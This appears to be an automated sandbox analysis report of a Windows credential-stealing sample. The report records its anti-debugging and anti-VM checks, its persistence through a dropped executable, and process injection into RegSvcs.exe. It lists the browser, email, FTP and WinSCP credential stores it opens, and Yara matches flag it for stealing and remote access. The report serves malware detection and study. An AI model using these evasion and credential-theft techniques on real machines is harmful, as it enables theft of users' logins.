                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_001760DD
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_001763F9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0017EB60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017F56F FindFirstFileW,FindClose,1_2_0017F56F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0017F5FA
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00181B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181B2F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00181C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181C8A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00181F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00181F94
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01016CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_01016CA9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_010160DD
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_010163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_010163F9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0101EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0101EB60
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0101F56F FindFirstFileW,FindClose,2_2_0101F56F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0101F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0101F5FA
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01021B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021B2F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01021C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021C8A
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01021F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_01021F94
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0014DDC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598216Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597706Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595146Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595019Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593688Jump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: RegSvcs.exe, 00000003.00000002.1761763756.0000000005830000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2850497763.00000000063A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI call chain: ExitProcess graph end nodegraph_1-96251
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI call chain: ExitProcess graph end nodegraph_1-94776
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI call chain: ExitProcess graph end nodegraph_1-95285
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00AD7070 CheckRemoteDebuggerPresent
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00186AAF BlockInput
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00133D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00163920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0023AF60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0177E470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0177E410 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0177CDD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_015AE470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_015AE4D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_015ACE30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 6_2_018C6EB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 6_2_018C8550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 6_2_018C84F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00158189 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00FF8189 SetUnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5B6008
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F62008
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016B106 LogonUserW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00133D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0017411C SendInput,keybd_event
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001774BB mouse_event
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0016A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: XoRPyi5s1i.exe, unjuridically.exe | Binary or memory string: Shell_TrayWnd
Source: XoRPyi5s1i.exe, 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp, unjuridically.exe, 00000002.00000002.1635324675.000000000107E000.00000040.00000001.01000000.00000004.sdmp, unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001565C4 cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0018091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_001AB340 GetUserNameW
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00161E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0014DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1712, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6796, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: unjuridically.exe | Binary or memory string: WIN_81
Source: unjuridically.exe | Binary or memory string: WIN_XP
Source: unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: unjuridically.exe | Binary or memory string: WIN_XPe
Source: unjuridically.exe | Binary or memory string: WIN_VISTA
Source: unjuridically.exe | Binary or memory string: WIN_7
Source: unjuridically.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1712, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6796, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
